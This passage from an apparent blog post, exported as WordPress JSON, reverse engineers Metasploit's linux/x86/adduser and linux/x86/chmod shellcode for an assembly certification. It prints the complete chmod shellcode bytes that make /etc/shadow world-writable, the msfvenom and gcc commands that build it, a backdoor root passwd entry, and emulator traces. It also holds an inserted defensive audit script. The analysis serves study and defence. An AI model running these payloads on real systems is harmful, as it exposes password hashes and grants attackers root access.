<strong>\"metasploit:Az\/dIsj4p4IRc:0:0::\/:\/bin\/sh\\nY\\213Q\\374j\\004Xj\\001X\"<\/strong>, obtained using the <strong>JMP-CALL-POP<\/strong> technique. The bytes after the newline are not part of the entry: they are the payload's own instructions following the string (starting with the <strong>pop ecx<\/strong>, 0x59 = 'Y') shown as characters, which is why <strong>count<\/strong> is what limits the write to the entry itself. 
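<\/p>\n\n\n\n<p>As an added example (not code from the original post or from the Metasploit project), the following Python helper audits a copy of \/etc\/passwd for entries shaped like the one this payload writes: a UID 0 account under a name other than root, and a password hash stored directly in the password field instead of the usual <strong>x<\/strong> placeholder that defers to \/etc\/shadow. The sample data, function names and finding texts are my own constructions.<\/p>\n\n

```python
# Added example (not code from the original post or from the Metasploit project):
# an audit helper a defender can run over a copy of /etc/passwd to flag entries
# shaped like the line the adduser payload appends. Names, sample data and the
# finding texts are my own constructions.
from dataclasses import dataclass
from typing import List, Optional

PASSWD_FIELDS = 7  # name:passwd:uid:gid:gecos:home:shell

# Password-field values that mean "no hash is stored here": 'x' defers to
# /etc/shadow, while '*', '!' and '!!' mark locked accounts.
NO_HASH_MARKERS = ('x', '*', '!', '!!')


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_line(line: str) -> Optional[PasswdEntry]:
    # One passwd line -> entry, or None if it does not have exactly seven
    # fields with numeric uid and gid (the payload's line parses cleanly).
    fields = line.split(':')
    if len(fields) != PASSWD_FIELDS:
        return None
    if not (fields[2].isdigit() and fields[3].isdigit()):
        return None
    return PasswdEntry(fields[0], fields[1], int(fields[2]), int(fields[3]),
                       fields[4], fields[5], fields[6])


def audit_passwd(text: str) -> List[str]:
    # Return one finding string per suspicious condition, in file order.
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith('#'):
            continue
        entry = parse_line(line)
        if entry is None:
            findings.append(f'line {lineno}: malformed entry')
            continue
        if entry.uid == 0 and entry.name != 'root':
            findings.append(f'{entry.name}: UID 0 account that is not root')
        if entry.passwd == '':
            findings.append(f'{entry.name}: empty password field')
        elif entry.passwd not in NO_HASH_MARKERS:
            # The payload stores a crypt(3) hash directly in /etc/passwd, so the
            # account can authenticate without any /etc/shadow entry at all.
            findings.append(f'{entry.name}: password hash stored in /etc/passwd')
    return findings


# Constructed sample: two ordinary entries plus the line the payload appends,
# exactly as shown in the write analysis above.
SAMPLE_PASSWD = (
    'root:x:0:0:root:/root:/bin/bash\n'
    'jack:x:1000:1000::/home/jack:/bin/bash\n'
    'metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh\n'
)

if __name__ == '__main__':
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

\n\n<p>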
As <strong>count<\/strong> (<strong>EDX<\/strong>) is set to 0x28, exactly the entry is written to \/etc\/passwd: its 39 characters plus the trailing newline.<\/p>\n\n\n\n<p>In this case, the string we will see appended to the \/etc\/passwd file is:<\/p>\n\n\n\n<p>metasploit:Az\/dIsj4p4IRc:0:0::\/:\/bin\/sh<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506074313.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We check the \/etc\/passwd file after executing this syscall and verify that the line has been appended to the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506074808.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To confirm that the payload worked as expected, we can also switch users with the <strong>su<\/strong> command to the newly created account, and verify that it has root permissions.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506075540.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Next, we move onto an analysis of the MSFvenom <strong>linux\/x86\/chmod<\/strong> shellcode.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 3: linux\/x86\/chmod<\/h2>\n\n\n\n<p>According to the description provided in <strong>MSFvenom<\/strong>, the <strong>linux\/x86\/chmod<\/strong> shellcode payload is designed to run <strong>chmod<\/strong> on a target file with a specified mode, effectively modifying its permissions.<\/p>\n\n\n\n<p>Looking at the payload options, this shellcode takes a <strong>file<\/strong> and a <strong>mode<\/strong> as arguments. 
By default, the <strong>file<\/strong> is set to <strong>\/etc\/shadow<\/strong> and the <strong>mode<\/strong> is set to <strong>0666<\/strong>, i.e. read and write access for the owner, the group and everyone else.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/opt\/libemu\/tools\/sctest]\n\u2514\u2500# msfvenom -p linux\/x86\/chmod --list-options                                                      1 \u2699\nOptions for payload\/linux\/x86\/chmod:\n=========================\n\n       Name: Linux Chmod\n     Module: payload\/linux\/x86\/chmod\n   Platform: Linux\n       Arch: x86\nNeeds Admin: No\n Total size: 36\n       Rank: Normal\n\nProvided by:\n    kris katterjohn &lt;katterjohn@gmail.com&gt;\n\nBasic options:\nName  Current Setting  Required  Description\n----  ---------------  --------  -----------\nFILE  \/etc\/shadow      yes       Filename to chmod\nMODE  0666             yes       File mode (octal)\n\nDescription:\n  Runs chmod on specified file with specified mode\n<\/pre><\/div>\n\n\n<p>To validate that this is the true functionality of the shellcode, we will perform analysis in the next section.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Emulation with Libemu<\/h3>\n\n\n\n<p>To begin, we use the <strong>sctest<\/strong> program from Libemu to emulate the <strong>linux\/x86\/chmod<\/strong> shellcode.<\/p>\n\n\n\n<p>We supply the arguments as follows:<\/p>\n\n\n\n<p><strong>msfvenom<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-p<\/strong>: Payload option set to linux\/x86\/chmod<\/li>\n\n\n\n<li><strong>R<\/strong>: Output shellcode in raw bytes<\/li>\n<\/ul>\n\n\n\n<p><strong>sctest<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-vvv<\/strong>: Set verbosity mode to 3.<\/li>\n\n\n\n<li><strong>-S<\/strong>: Read shellcode from stdin<\/li>\n\n\n\n<li><strong>-s<\/strong>: Run for 10,000 
steps<\/li>\n\n\n\n<li><strong>-G<\/strong>: Save graphical output<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/chmod R | .\/sctest -vvv -Ss 10000 -G chmod.dot\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngraph file chmod.dot\nverbose = 3\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 36 bytes\n\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 99                              cwd \n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417001\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 6A0F                            push byte 0xf\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417003\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 58        
                      pop eax\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417004\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 52                              push edx\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417005\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] E8                              call 0x1\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417016\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 5B                              pop ebx\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417017\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 68B6010000                      push dword 0x1b6\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x0041701c\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 59                              pop ecx\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x0041701d\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  
ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] CD80                            int 0x80\nsys_chmod(2)\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x0041701f\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 6A01                            push byte 0x1\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417021\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 58                              pop eax\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417022\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000001  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] CD80                            int 0x80\nsys_exit(2)\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417024\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 0000                            add &#x5B;eax],al\ncpu error error accessing 0x00000004 not mapped\n\nstepcount 12\ncopying vertexes\noptimizing graph\nvertex 0x513810\ngoing forwards from 0x513810\n -&gt; vertex 0x513a30\n -&gt; vertex 0x513b20\n -&gt; vertex 0x513c00\n -&gt; vertex 0x513df0\n -&gt; vertex 0x513f90\n -&gt; vertex 0x514130\n -&gt; vertex 0x5142a0\ncopying edges for 0x5142a0\n -&gt; 0x517760\nvertex 0x5144b0\ngoing 
forwards from 0x5144b0\ncopying edges for 0x5144b0\n -&gt; 0x517870\nvertex 0x5145d0\ngoing forwards from 0x5145d0\n -&gt; vertex 0x5147a0\ncopying edges for 0x5147a0\n -&gt; 0x517ad0\nvertex 0x514950\ngoing forwards from 0x514950\ncopying edges for 0x514950\nvertex 0x514a90\ngoing forwards from 0x514a90\ncopying edges for 0x514a90\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417026\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \nERROR  chmod (\n) =  -1;\nERROR  exit (\n     int status = 4288522;\n) =  -1;\n<\/pre><\/div>\n\n\n<p>Once again, as less information is returned on this relatively small payload, we look to tools such as Ndisasm and GDB to understand how the payload is working at a low level.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Disassembly with Ndisasm<\/h3>\n\n\n\n<p>Next, we use ndisasm to disassemble the shellcode generated by MSFvenom. 
The payload gets broken down into its assembly instructions as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/chmod R | ndisasm -u -                                                    1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 36 bytes\n\n00000000  99                cdq\n00000001  6A0F              push byte +0xf\n00000003  58                pop eax\n00000004  52                push edx\n00000005  E80C000000        call 0x16\n0000000A  2F                das\n0000000B  657463            gs jz 0x71\n0000000E  2F                das\n0000000F  7368              jnc 0x79\n00000011  61                popa\n00000012  646F              fs outsd\n00000014  7700              ja 0x16\n00000016  5B                pop ebx\n00000017  68B6010000        push dword 0x1b6\n0000001C  59                pop ecx\n0000001D  CD80              int 0x80\n0000001F  6A01              push byte +0x1\n00000021  58                pop eax\n00000022  CD80              int 0x80\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506084652.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>From the above output, we can focus on the syscalls that are performed. 
We will again backtrace this based on the value populating the <strong>EAX<\/strong> register prior to each syscall.<\/p>\n\n\n\n<p>The file \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h contains references to each syscall number.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506085237.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>From this, we pick out a list of syscalls using the following syscall numbers.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0xf - syscall 15 - <strong>chmod<\/strong><\/li>\n\n\n\n<li>0x1 - syscall 1 - <strong>exit<\/strong><\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint chmod(const char *pathname, mode_t mode);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nvoid exit(int status);\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis with GDB<\/h3>\n\n\n\n<p>Next, we perform a dynamic analysis using gdb by stepping through the program an instruction at a time.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Compilation and setup<\/h4>\n\n\n\n<p>Before we begin, we use MSFvenom to output the shellcode into C format:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/chmod -f C                                                                1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 36 bytes\nFinal size of c file: 177 bytes\nunsigned char buf&#x5B;] = 
\n&quot;\\x99\\x6a\\x0f\\x58\\x52\\xe8\\x0c\\x00\\x00\\x00\\x2f\\x65\\x74\\x63\\x2f&quot;\n&quot;\\x73\\x68\\x61\\x64\\x6f\\x77\\x00\\x5b\\x68\\xb6\\x01\\x00\\x00\\x59\\xcd&quot;\n&quot;\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506085822.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then compile the shellcode with gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack chmod_shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506085919.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we launch gdb and set a breakpoint to the main function using the <strong>break<\/strong> command:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506163958.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We run the program, hit the main breakpoint, and disassemble the <strong>code<\/strong> variable which contains the <strong>chmod<\/strong> shellcode.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506164051.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We set the breakpoint at the start of the linux\/x86\/chmod shellcode payload so we can start going through it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506164641.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 
class=\"wp-block-heading\">chmod analysis<\/h4>\n\n\n\n<p>To begin, the syscall number for <strong>chmod<\/strong> (0xf) is pushed to the stack and popped into <strong>EAX<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506170409.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, using the <strong>JMP-CALL-POP<\/strong> technique, the address of the \"\/etc\/shadow\" string is popped into the <strong>EBX<\/strong> register for the <strong>*pathname<\/strong> argument.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506170924.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The string address is popped into the <strong>EBX<\/strong> register, matching the syscall argument convention (first argument in <strong>EBX<\/strong>).<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171245.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, the value <strong>0x1b6<\/strong> is popped into the <strong>ECX<\/strong> register, which holds the second argument, <strong>mode<\/strong>.<\/p>\n\n\n\n<p>According to the man page for <strong>chmod<\/strong>, the <strong>mode<\/strong> argument can be either a 'symbolic representation of changes to make, or an octal number representing the bit pattern for the new mode bits'.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171900.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We convert the <strong>0x1b6<\/strong> value using an <a href=\"https:\/\/www.rapidtables.com\/convert\/number\/hex-to-octal.html\">online hex converter<\/a> and confirm it resolves to the octal value of <strong>666<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171718.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This <strong>666<\/strong> value in Linux grants read and write permissions to everyone.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171555.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">exit analysis<\/h3>\n\n\n\n<p>Once the call to <strong>chmod<\/strong> is made, the shellcode wraps up by calling the <strong>exit<\/strong> syscall, which gracefully exits the program.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506172153.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To confirm that the payload worked as expected, we check the permissions on the \/etc\/shadow file, and verify that they have been modified as expected.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506172256.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<p>That concludes our analysis of the three example shellcode samples from MSFvenom.<\/p>\n\n\n\n<p>Whilst this blog post was more focused on performing analysis of existing shellcodes instead of writing code, all notes and tool outputs from this analysis can be found on my <a href=\"https:\/\/github.com\/war4uthor\/SLAE32\">GitHub repository<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SecurityTube Linux Assembly 
Expert<\/a> certification.<\/p>\n\n\n\n<p><strong>Student ID:<\/strong> PA-6483<\/p>\n\n\n\n<p>All code was tested on 32-bit Kali Linux:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(jack\u327fkali)-&#x5B;~\/SLAE32\/Assignment 5: MSFvenom Shellcode Analysis]\n\u2514\u2500$ uname -a\nLinux kali 5.5.0-kali2-686-pae #1 SMP Debian 5.5.17-1kali1 (2020-04-21) i686 GNU\/Linux\n<\/pre><\/div>\n\n\n<p>In the next blog post, we will be covering polymorphism, and applying the concept to shellcode samples to improve efficiency and reduce size.<\/p>\n\n\n\n<p>Thanks for reading!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n","protected":false},"excerpt":{"rendered":"<p>In this blog post, we will be covering our process behind reverse engineering and understanding popular shellcode payloads maintained in the payload module of the Metasploit project, MSFvenom. As this blog series is based on x86 Linux, this post will focus on payloads supporting this architecture and platform. 
This post is the fifth entry in&hellip;<\/p>\n","protected":false},"author":1,"featured_media":305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,6,30,26,28],"tags":[27],"class_list":["post-284","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assembly","category-certifications","category-linux","category-reverse-engineering","category-shellcoding","tag-slae32"],"_links":{"self":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=284"}],"version-history":[{"count":17,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/284\/revisions"}],"predecessor-version":[{"id":748,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/284\/revisions\/748"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=2
84"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}